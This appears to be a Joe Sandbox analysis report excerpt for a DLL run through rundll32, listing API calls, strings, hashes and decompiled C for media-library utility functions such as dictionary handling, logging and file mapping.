                                                                      • Opcode ID: c3b2448d299c3e7ec0f0b399289f88982a6b045d30e820103abfaa4dec61d1d3
                                                                      • Instruction ID: 8f6e5ec8c3f0a619e422cb1a926671cc568e29337de09296a572835a12694a18
                                                                      • Opcode Fuzzy Hash: c3b2448d299c3e7ec0f0b399289f88982a6b045d30e820103abfaa4dec61d1d3
                                                                      • Instruction Fuzzy Hash: 539117B59097458FC754DF68C18066EBBE0FF88380F56892DED889B341DB74E880CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mvpriv_open.F086 ref: 1001933F
                                                                        • Part of subcall function 100195E0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10019633
                                                                        • Part of subcall function 100195E0: mv_calloc.F086 ref: 1001964E
                                                                        • Part of subcall function 100195E0: MultiByteToWideChar.KERNEL32 ref: 10019685
                                                                        • Part of subcall function 100195E0: mv_calloc.F086 ref: 100196D7
                                                                        • Part of subcall function 100195E0: mv_freep.F086 ref: 10019713
                                                                        • Part of subcall function 100195E0: wcslen.MSVCRT ref: 1001971F
                                                                        • Part of subcall function 100195E0: _wsopen.MSVCRT ref: 1001974B
                                                                      • _fstat64.MSVCRT ref: 10019366
                                                                      • _close.MSVCRT ref: 10019394
                                                                      • _get_osfhandle.MSVCRT ref: 100193C5
                                                                      • CreateFileMappingA.KERNEL32 ref: 100193ED
                                                                      • MapViewOfFile.KERNEL32 ref: 10019422
                                                                      • CloseHandle.KERNEL32 ref: 10019434
                                                                      • mv_log.F086 ref: 1001945D
                                                                      • _close.MSVCRT ref: 10019465
                                                                      • _errno.MSVCRT ref: 10019480
                                                                      • mv_strerror.F086 ref: 100194A1
                                                                      • mv_log.F086 ref: 100194C7
                                                                      • _errno.MSVCRT ref: 100194D8
                                                                      • mv_strerror.F086 ref: 100194FE
                                                                      • mv_log.F086 ref: 1001951B
                                                                      • _close.MSVCRT ref: 10019523
                                                                      • mv_log.F086 ref: 1001954F
                                                                      • _close.MSVCRT ref: 10019557
                                                                      Strings
                                                                      • Error occurred in CreateFileMapping(), xrefs: 10019561
                                                                      • Cannot read file '%s': %s, xrefs: 100194A6
                                                                      • Error occurred in fstat(): %s, xrefs: 1001950B
                                                                      • File size for file '%s' is too big, xrefs: 10019535
                                                                      Similarity
                                                                      • API ID: _closemv_log$ByteCharFileMultiWide_errnomv_callocmv_strerror$CloseCreateHandleMappingView_fstat64_get_osfhandle_wsopenmv_freepmvpriv_openwcslen
                                                                      • String ID: Cannot read file '%s': %s$Error occurred in CreateFileMapping()$Error occurred in fstat(): %s$File size for file '%s' is too big
                                                                      • API String ID: 2213036534-2445208470
                                                                      • Opcode ID: f3d6b5768689cfe5005ee31c4e5cc66ead5e4a9d6eb64f32d910fd6e1a6354d1
                                                                      • Instruction ID: a1ac4bca67f905ea7eb530c9fec20e9fe0d2cf07c5fae6ebec99be3d32fbbfc6
                                                                      • Opcode Fuzzy Hash: f3d6b5768689cfe5005ee31c4e5cc66ead5e4a9d6eb64f32d910fd6e1a6354d1
                                                                      • Instruction Fuzzy Hash: 8561BDB59097459FC310DF29C48429EBBE4FF88710F51892EE8D98B350EB78D9808F82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: mv_freep$mv_log
                                                                      • String ID: %-15s $ (default $"%s"$%d/%d$%lld
                                                                      • API String ID: 2749705325-3616743394
                                                                      • Opcode ID: 980a76943a0335aee30f922a9d190d9bdb0ce562017a62854cf0290bc96f8399
                                                                      • Instruction ID: e291881e513b933ead242bebe0381d4369face5adc3570e656dab592c6f763c7
                                                                      • Opcode Fuzzy Hash: 980a76943a0335aee30f922a9d190d9bdb0ce562017a62854cf0290bc96f8399
                                                                      • Instruction Fuzzy Hash: D591A278A08B458FC750DF68D580A5EBBE1FF89390F91892EF99987311E774E841CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • Invalid 0xRRGGBB[AA] color string: '%s', xrefs: 10031717
                                                                      • 0123456789ABCDEFabcdef, xrefs: 100315EB
                                                                      • bikeshed, xrefs: 100314DB
                                                                      • Invalid alpha value specifier '%s' in '%s', xrefs: 100316E4
                                                                      • random, xrefs: 100314C6
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_strcasecmpstrlen$mv_get_random_seedmv_strlcpystrchrstrtoul
                                                                      • String ID: 0123456789ABCDEFabcdef$Invalid 0xRRGGBB[AA] color string: '%s'$Invalid alpha value specifier '%s' in '%s'$bikeshed$random
                                                                      • API String ID: 887406882-1143575717
                                                                      • Opcode ID: c0171da440a50a3ac54d9c683c706d3676e2163e985c2b92080aa2cb108a1475
                                                                      • Instruction ID: 8bd814382b19517d639cc9fd4417e09b44f3e243961e33b67ed5873bedcaf9bd
                                                                      • Opcode Fuzzy Hash: c0171da440a50a3ac54d9c683c706d3676e2163e985c2b92080aa2cb108a1475
                                                                      • Instruction Fuzzy Hash: 0F817A749087859ED342DF78C48129EBBF4EF89381F55CA2EE4C99B251E734D880DB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 20%
                                                                      			E10011210(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr __ebp, signed int _a4, signed int _a8, void* _a12, signed int _a16) {
                                                                      				intOrPtr _v4;
                                                                      				intOrPtr _v8;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				void* _v32;
                                                                      				void* _v36;
                                                                      				int _v48;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _t94;
                                                                      				signed int* _t95;
                                                                      				signed int _t101;
                                                                      				signed int _t102;
                                                                      				signed int _t104;
                                                                      				signed int _t106;
                                                                      				int _t108;
                                                                      				int _t109;
                                                                      				int _t111;
                                                                      				signed int* _t118;
                                                                      				int _t122;
                                                                      				signed int _t123;
                                                                      				int _t126;
                                                                      				signed int _t127;
                                                                      				signed int* _t130;
                                                                      				int _t133;
                                                                      				signed int _t134;
                                                                      				void _t136;
                                                                      				signed int _t138;
                                                                      				void* _t142;
                                                                      				signed int _t146;
                                                                      				void* _t147;
                                                                      				signed int _t149;
                                                                      				signed int _t150;
                                                                      				int _t153;
                                                                      				void* _t154;
                                                                      				signed int* _t157;
                                                                      				signed int* _t158;
                                                                      
                                                                      				_v8 = __edi;
                                                                      				_v16 = __ebx;
                                                                      				_t138 = _a16;
                                                                      				_v12 = __esi;
                                                                      				_t146 = _a8;
                                                                      				_v4 = __ebp;
                                                                      				_t118 =  *_a4;
                                                                      				_v36 = 0;
                                                                      				_v32 = 0;
                                                                      				if((_t138 & 0x00000008) == 0) {
                                                                      					if(_a12 == 0) {
                                                                      						goto L2;
                                                                      					}
                                                                      					 *_t158 = _a12;
                                                                      					_v32 = E100292E0(_t118, _t138, _t146, __ebp);
                                                                      					if(_t146 != 0) {
                                                                      						goto L3;
                                                                      					}
                                                                      					goto L22;
                                                                      				} else {
                                                                      					_v32 = _a12;
                                                                      					L2:
                                                                      					if(_t146 == 0) {
                                                                      						L22:
                                                                      						_t147 = 0xffffffea;
                                                                      						L23:
                                                                      						if(_t118 == 0) {
                                                                      							L10:
                                                                      							 *_t158 = _v36;
                                                                      							L100290D0();
                                                                      							 *_t158 = _v32;
                                                                      							L100290D0();
                                                                      							L11:
                                                                      							return _t147;
                                                                      						}
                                                                      						L9:
                                                                      						if( *_t118 == 0) {
                                                                      							 *_t158 =  &(_t118[1]);
                                                                      							E100290E0();
                                                                      							 *_t158 = _a4;
                                                                      							E100290E0();
                                                                      						}
                                                                      						goto L10;
                                                                      					}
                                                                      					L3:
                                                                      					_t157 = 0;
                                                                      					if((_t138 & 0x00000040) == 0) {
                                                                      						_v64 = _t138;
                                                                      						_v68 = 0;
                                                                      						_v72 = _t146;
                                                                      						 *_t158 = _t118;
                                                                      						_t157 = E100110D0();
                                                                      					}
                                                                      					if((_t138 & 0x00000004) == 0) {
                                                                      						 *_t158 = _t146;
                                                                      						_t94 = E100292E0(_t118, _t138, _t146, _t157);
                                                                      						_v36 = _t94;
                                                                      						_t149 = _t94;
                                                                      						if(_t118 == 0) {
                                                                      							goto L29;
                                                                      						}
                                                                      						if(_t94 == 0) {
                                                                      							goto L8;
                                                                      						}
                                                                      						goto L6;
                                                                      					} else {
                                                                      						_v36 = _t146;
                                                                      						if(_t118 == 0) {
                                                                      							L29:
                                                                      							 *_t158 = 8;
                                                                      							_t95 = E10029100();
                                                                      							_t149 = _v36;
                                                                      							_t118 = _t95;
                                                                      							 *_a4 = _t118;
                                                                      							if(_t118 == 0 || _t149 == 0) {
                                                                      								_t147 = 0xfffffff4;
                                                                      								goto L23;
                                                                      							} else {
                                                                      								goto L6;
                                                                      							}
                                                                      						}
                                                                      						L6:
                                                                      						_t122 = _v32;
                                                                      						if(_a12 == 0 || _t122 != 0) {
                                                                      							if(_t157 == 0) {
                                                                      								_t150 =  *_t118;
                                                                      								if(_t122 == 0) {
                                                                      									L37:
                                                                      									if(_t150 == 0) {
                                                                      										 *_t158 =  &(_t118[1]);
                                                                      										E100290E0();
                                                                      										 *_t158 = _a4;
                                                                      										E100290E0();
                                                                      									}
                                                                      									_t147 = 0;
                                                                      									 *_t158 =  &_v36;
                                                                      									E100290E0();
                                                                      									goto L11;
                                                                      								}
                                                                      								_v68 = 8;
                                                                      								_v72 = _t150 + 1;
                                                                      								 *_t158 = _t118[1];
                                                                      								_t101 = E10029010();
                                                                      								_t123 = _t101;
                                                                      								if(_t101 == 0) {
                                                                      									goto L8;
                                                                      								}
                                                                      								_t118[1] = _t101;
                                                                      								_t150 =  *_t118;
                                                                      								L18:
                                                                      								_t102 = _v32;
                                                                      								if(_t102 == 0) {
                                                                      									goto L37;
                                                                      								}
                                                                      								_t130 = _t123 + _t150 * 8;
                                                                      								_t130[1] = _t102;
                                                                      								 *_t130 = _v36;
                                                                      								 *_t118 = _t150 + 1;
                                                                      								_t147 = 0;
                                                                      								goto L11;
                                                                      							}
                                                                      							if((_t138 & 0x00000010) != 0) {
                                                                      								 *_t158 = _t149;
                                                                      								_t147 = 0;
                                                                      								L100290D0();
                                                                      								 *_t158 = _v32;
                                                                      								L100290D0();
                                                                      								goto L11;
                                                                      							}
                                                                      							_t104 = _a4;
                                                                      							if(_t122 == 0 || (_t138 & 0x00000020) == 0) {
                                                                      								 *_t158 = _t104;
                                                                      								L100290D0();
                                                                      								goto L17;
                                                                      							} else {
                                                                      								 *_t158 = _t104;
                                                                      								_v48 = _t122;
                                                                      								_t108 = strlen(??);
                                                                      								 *_t158 = _v48;
                                                                      								_t153 = _t108;
                                                                      								_t109 = strlen(??);
                                                                      								 *_t158 = _t104;
                                                                      								_v48 = _t109;
                                                                      								_t63 = _t109 + 1; // 0x1
                                                                      								_v72 = _t153 + _t63;
                                                                      								_t111 = L10028DA0();
                                                                      								if(_t111 == 0) {
                                                                      									goto L8;
                                                                      								}
                                                                      								_t133 = _v48;
                                                                      								_t142 = _t111 + _t153;
                                                                      								_t154 = _v32;
                                                                      								_t126 = _t133 + 1;
                                                                      								if(_t126 >= 8) {
                                                                      									if((_t142 & 0x00000001) != 0) {
                                                                      										_t127 =  *_t154 & 0x000000ff;
                                                                      										_t142 = _t142 + 1;
                                                                      										_t154 = _t154 + 1;
                                                                      										 *(_t142 - 1) = _t127;
                                                                      										_t126 = _t133;
                                                                      									}
                                                                      									if((_t142 & 0x00000002) != 0) {
                                                                      										_t134 =  *_t154 & 0x0000ffff;
                                                                      										_t142 = _t142 + 2;
                                                                      										_t154 = _t154 + 2;
                                                                      										_t126 = _t126 - 2;
                                                                      										 *(_t142 - 2) = _t134;
                                                                      									}
                                                                      									if((_t142 & 0x00000004) != 0) {
                                                                      										_t136 =  *_t154;
                                                                      										_t142 = _t142 + 4;
                                                                      										_t154 = _t154 + 4;
                                                                      										_t126 = _t126 - 4;
                                                                      										 *(_t142 - 4) = _t136;
                                                                      									}
                                                                      								}
                                                                      								_v48 = _t111;
                                                                      								memcpy(_t142, _t154, _t126);
                                                                      								_t158 =  &(_t158[3]);
                                                                      								 *_t158 =  &_v32;
                                                                      								E100290E0();
                                                                      								_v32 = _v48;
                                                                      								L17:
                                                                      								 *_t158 =  *_t157;
                                                                      								L100290D0();
                                                                      								_t106 =  *_t118;
                                                                      								_t123 = _t118[1];
                                                                      								_t31 = _t106 - 1; // -1
                                                                      								_t150 = _t31;
                                                                      								 *_t118 = _t150;
                                                                      								 *_t157 =  *(_t123 + _t150 * 8);
                                                                      								_a4 =  *(_t123 + 4 + _t150 * 8);
                                                                      								goto L18;
                                                                      							}
                                                                      						} else {
                                                                      							L8:
                                                                      							_t147 = 0xfffffff4;
                                                                      							goto L9;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      			}
                                                                      0x100113d8
                                                                      0x100113da
                                                                      0x100113e4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100113da
                                                                      0x1001127f
                                                                      0x10011283
                                                                      0x10011289
                                                                      0x100112d2
                                                                      0x10011432
                                                                      0x10011434
                                                                      0x10011468
                                                                      0x1001146a
                                                                      0x100114fb
                                                                      0x100114fe
                                                                      0x10011507
                                                                      0x1001150a
                                                                      0x1001150a
                                                                      0x10011474
                                                                      0x10011476
                                                                      0x10011479
                                                                      0x00000000
                                                                      0x10011479
                                                                      0x1001143c
                                                                      0x10011440
                                                                      0x10011447
                                                                      0x1001144a
                                                                      0x10011451
                                                                      0x10011453
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10011459
                                                                      0x1001145c
                                                                      0x1001131e
                                                                      0x1001131e
                                                                      0x10011324
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1001132a
                                                                      0x10011332
                                                                      0x10011335
                                                                      0x10011337
                                                                      0x10011339
                                                                      0x00000000
                                                                      0x10011339
                                                                      0x100112de
                                                                      0x100113f0
                                                                      0x100113f3
                                                                      0x100113f5
                                                                      0x100113fe
                                                                      0x10011401
                                                                      0x00000000
                                                                      0x10011401
                                                                      0x100112e6
                                                                      0x100112e9
                                                                      0x100112f4
                                                                      0x100112f7
                                                                      0x00000000
                                                                      0x10011488
                                                                      0x10011488
                                                                      0x1001148d
                                                                      0x10011491
                                                                      0x1001149a
                                                                      0x1001149d
                                                                      0x1001149f
                                                                      0x100114a4
                                                                      0x100114a9
                                                                      0x100114ad
                                                                      0x100114b1
                                                                      0x100114b5
                                                                      0x100114bc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100114c2
                                                                      0x100114c6
                                                                      0x100114c9
                                                                      0x100114cd
                                                                      0x100114d3
                                                                      0x1001151e
                                                                      0x10011540
                                                                      0x10011543
                                                                      0x10011544
                                                                      0x10011545
                                                                      0x10011548
                                                                      0x10011548
                                                                      0x10011526
                                                                      0x1001154c
                                                                      0x1001154f
                                                                      0x10011552
                                                                      0x10011555
                                                                      0x10011558
                                                                      0x10011558
                                                                      0x1001152e
                                                                      0x10011530
                                                                      0x10011532
                                                                      0x10011535
                                                                      0x10011538
                                                                      0x1001153b
                                                                      0x1001153b
                                                                      0x1001152e
                                                                      0x100114d5
                                                                      0x100114dd
                                                                      0x100114dd
                                                                      0x100114df
                                                                      0x100114e2
                                                                      0x100114eb
                                                                      0x100112fc
                                                                      0x100112ff
                                                                      0x10011302
                                                                      0x10011307
                                                                      0x10011309
                                                                      0x1001130c
                                                                      0x1001130c
                                                                      0x1001130f
                                                                      0x10011318
                                                                      0x1001131b
                                                                      0x00000000
                                                                      0x1001131b
                                                                      0x1001128f
                                                                      0x1001128f
                                                                      0x1001128f
                                                                      0x00000000
                                                                      0x1001128f
                                                                      0x10011289
                                                                      0x1001126d

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_strdup$mv_dict_getmv_mallocz
                                                                      • String ID:
                                                                      • API String ID: 3834523185-0
                                                                      • Opcode ID: 92e61786e18b3758c0339e56a8e0c00a76c00a96181e52d74e44f6f1d6311550
                                                                      • Instruction ID: 56232f5dd71c1c11c53de360d97ca929451fd6b060f0d926ddb83f3af19d46ac
                                                                      • Opcode Fuzzy Hash: 92e61786e18b3758c0339e56a8e0c00a76c00a96181e52d74e44f6f1d6311550
                                                                      • Instruction Fuzzy Hash: 2E9127B5A087158FC754DF68C08065EBBE1EF98790F52892DED999B340E770E981CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 44%
                                                                      			E10026250() {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				signed int _t100;
                                                                      				signed int _t104;
                                                                      				void* _t108;
                                                                      				char* _t112;
                                                                      				intOrPtr _t127;
                                                                      				char* _t128;
                                                                      				void* _t131;
                                                                      				char* _t132;
                                                                      				signed int _t136;
                                                                      				signed int _t138;
                                                                      				void* _t139;
                                                                      				signed int _t141;
                                                                      				signed int _t143;
                                                                      				signed int _t145;
                                                                      				signed int _t147;
                                                                      				signed int _t149;
                                                                      				signed int _t152;
                                                                      				signed int _t155;
                                                                      				signed int _t158;
                                                                      				signed int _t161;
                                                                      				signed int _t162;
                                                                      				signed int _t164;
                                                                      				signed int _t166;
                                                                      				void* _t167;
                                                                      				signed int* _t168;
                                                                      
                                                                      				_t168 = _t167 - L100918A0(0x103c);
                                                                      				_t136 = _t168[0x414];
                                                                      				if(_t136 == 0) {
                                                                      					_t168[2] = 1;
                                                                      					 *_t168 =  &(_t168[0xc]);
                                                                      					_t168[1] = 0;
                                                                      					L10008880(0, 0, 1, 1);
                                                                      					_t168[2] = 1;
                                                                      					_t161 =  &(_t168[0x20c]);
                                                                      					_t168[1] = 0;
                                                                      					_t158 =  &(_t168[0x30c]);
                                                                      					 *_t168 =  &(_t168[0x10c]);
                                                                      					L10008880(0, _t158, _t161, 1);
                                                                      					_t168[1] = 0;
                                                                      					_t168[2] = 1;
                                                                      					 *_t168 = _t161;
                                                                      					L10008880(0, _t158, _t161, 1);
                                                                      					_t168[2] = 0x10000;
                                                                      					_t168[1] = 0;
                                                                      					 *_t168 = _t158;
                                                                      					L10008880(0, _t158, _t161, 1);
                                                                      					_t100 =  *(_t168[0x41a]) & 0xffffff00 |  *(_t168[0x41a]) != 0x00000000;
                                                                      					L8:
                                                                      					if(_t168[0x415] >= 0xfffffff9 && _t100 != 0 && ( *0x100d76ac & 0x00000002) != 0) {
                                                                      						_t67 = _t168[0x415] + 8; // 0x101
                                                                      						_t152 = _t67;
                                                                      						_t112 = 0x100b6d3b;
                                                                      						if(_t152 <= 0x40) {
                                                                      							_t112 =  *(0x100b6f40 + _t152 * 4);
                                                                      						}
                                                                      						_t168[2] = _t112;
                                                                      						_t168[1] = "[%s] ";
                                                                      						 *_t168 = _t161;
                                                                      						L100089C0();
                                                                      					}
                                                                      					 *_t168 = _t158;
                                                                      					_t168[2] = _t168[0x417];
                                                                      					_t168[1] = _t168[0x416];
                                                                      					L10008B70();
                                                                      					_t104 = _t168[0xc];
                                                                      					_t141 = _t168[0x10c];
                                                                      					_t162 = _t168[0x20c];
                                                                      					_t138 = _t168[0x30c];
                                                                      					if( *_t104 != 0 ||  *_t141 != 0 ||  *_t162 != 0) {
                                                                      						L12:
                                                                      						_t164 = _t168[0x30d];
                                                                      						_t147 = 0;
                                                                      						if(_t164 != 0 && _t168[0x30e] >= _t164) {
                                                                      							_t149 =  *(_t138 + _t164 - 1) & 0x000000ff;
                                                                      							_t168[0xa] = _t149 == 0xa;
                                                                      							_t147 = (_t149 & 0xffffff00 | _t149 == 0x0000000d | _t168[0xa]) & 0x000000ff;
                                                                      						}
                                                                      						 *(_t168[0x41a]) = _t147;
                                                                      						goto L16;
                                                                      					} else {
                                                                      						if( *_t138 == 0) {
                                                                      							L16:
                                                                      							_t168[3] = _t104;
                                                                      							_t168[2] = "%s%s%s%s";
                                                                      							_t168[6] = _t138;
                                                                      							_t168[5] = _t162;
                                                                      							_t168[4] = _t141;
                                                                      							_t168[1] = _t168[0x419];
                                                                      							 *_t168 = _t168[0x418];
                                                                      							_t108 = L10025AE0();
                                                                      							 *_t168 = _t158;
                                                                      							_t168[1] = 0;
                                                                      							_t139 = _t108;
                                                                      							E10009690(_t139, _t141, _t158, _t162);
                                                                      							return _t139;
                                                                      						}
                                                                      						goto L12;
                                                                      					}
                                                                      				}
                                                                      				_t168[2] = 1;
                                                                      				_t166 =  &(_t168[0x10c]);
                                                                      				_t168[1] = 0;
                                                                      				 *_t168 =  &(_t168[0xc]);
                                                                      				_t161 =  &(_t168[0x20c]);
                                                                      				_t168[0xa] =  *_t136;
                                                                      				L10008880(_t136, 0x10000, _t161, _t166);
                                                                      				_t168[2] = 1;
                                                                      				_t168[1] = 0;
                                                                      				 *_t168 = _t166;
                                                                      				L10008880(_t136, 0x10000, _t161, _t166);
                                                                      				_t168[2] = 1;
                                                                      				_t168[1] = 0;
                                                                      				 *_t168 = _t161;
                                                                      				L10008880(_t136, 0x10000, _t161, _t166);
                                                                      				_t168[2] = 0x10000;
                                                                      				_t158 =  &(_t168[0x30c]);
                                                                      				_t168[1] = 0;
                                                                      				 *_t168 = _t158;
                                                                      				L10008880(_t136, _t158, _t161, _t166);
                                                                      				_t155 = _t168[0xa];
                                                                      				_t143 = 0 |  *(_t168[0x41a]) != 0x00000000;
                                                                      				_t100 = _t143;
                                                                      				if(_t155 != 0 && _t143 != 0) {
                                                                      					_t127 =  *((intOrPtr*)(_t155 + 0x14));
                                                                      					if(_t127 != 0) {
                                                                      						_t145 =  *(_t136 + _t127);
                                                                      						if(_t145 != 0) {
                                                                      							_t131 =  *_t145;
                                                                      							if(_t131 != 0) {
                                                                      								 *_t168 = _t145;
                                                                      								_t168[0xb] = _t155;
                                                                      								_t168[0xa] = _t145;
                                                                      								_t132 =  *((intOrPtr*)(_t131 + 4))();
                                                                      								_t168[3] = _t168[0xa];
                                                                      								_t168[2] = _t132;
                                                                      								_t168[1] = "[%s @ %p] ";
                                                                      								 *_t168 =  &(_t168[0xc]);
                                                                      								L100089C0();
                                                                      								_t155 = _t168[0xb];
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					 *_t168 = _t136;
                                                                      					_t128 =  *((intOrPtr*)(_t155 + 4))();
                                                                      					_t168[3] = _t136;
                                                                      					_t168[1] = "[%s @ %p] ";
                                                                      					 *_t168 = _t166;
                                                                      					_t168[2] = _t128;
                                                                      					L100089C0();
                                                                      					_t100 = _t168[0x41a] & 0xffffff00 |  *(_t168[0x41a]) != 0x00000000;
                                                                      				}
                                                                      			}

































                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_bprint_init$mv_bprintf$mv_bprint_finalizemv_vbprintf
                                                                      • String ID: %s%s%s%s$[%s @ %p] $[%s]
                                                                      • API String ID: 2514531573-1798253436
                                                                      • Opcode ID: 3f2bd632272b9df47179aee3b67c56da7bd7b79c66d3fadd9b491fc2fadde794
                                                                      • Instruction ID: c71d304a02298176911f7b5d9492a31840536d8b4fe4b07b2d7bce997b72d9a0
                                                                      • Opcode Fuzzy Hash: 3f2bd632272b9df47179aee3b67c56da7bd7b79c66d3fadd9b491fc2fadde794
                                                                      • Instruction Fuzzy Hash: 808119B49097809FD350DF28D48069FBBE1FF88340F85892EE8C887355DB75AA84CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_log$mv_get_pix_fmt_name
                                                                      • String ID: Error creating an internal frame pool$Failed to open device handle$NV12$P010$Unknown surface type: %lu$Unsupported pixel format: %s
                                                                      • API String ID: 2830795485-4196069199
                                                                      • Opcode ID: 7e434e73dff374732bf92a6c6b461502dd5c9fdd604f663b4050518d1b8bf5f6
                                                                      • Instruction ID: dbfc9fc73534cf50ff89b72e71a8ef33aba9b4af1470f45bc046c89c466e1acb
                                                                      • Opcode Fuzzy Hash: 7e434e73dff374732bf92a6c6b461502dd5c9fdd604f663b4050518d1b8bf5f6
                                                                      • Instruction Fuzzy Hash: 3371C2B46087459FC750DF29D58460ABBE1FF88300F91C96EF9998B356E774E840DB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 28%
                                                                      			E1001E450(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
                                                                      				signed int _t213;
                                                                      				signed int _t214;
                                                                      				intOrPtr _t215;
                                                                      				signed int _t219;
                                                                      				signed int _t220;
                                                                      				signed int _t221;
                                                                      				signed int _t224;
                                                                      				signed int _t227;
                                                                      				signed int _t228;
                                                                      				signed int _t230;
                                                                      				signed int _t247;
                                                                      				signed int _t253;
                                                                      				signed int _t254;
                                                                      				signed int _t255;
                                                                      				signed int _t257;
                                                                      				void* _t258;
                                                                      				void* _t259;
                                                                      				signed int _t261;
                                                                      				void* _t262;
                                                                      				void* _t263;
                                                                      				signed char _t267;
                                                                      				signed int _t268;
                                                                      				signed int _t269;
                                                                      				signed int _t273;
                                                                      				intOrPtr _t275;
                                                                      				intOrPtr _t280;
                                                                      				signed int _t281;
                                                                      				signed int _t282;
                                                                      				signed int _t283;
                                                                      				intOrPtr _t289;
                                                                      				signed int _t291;
                                                                      				signed int _t297;
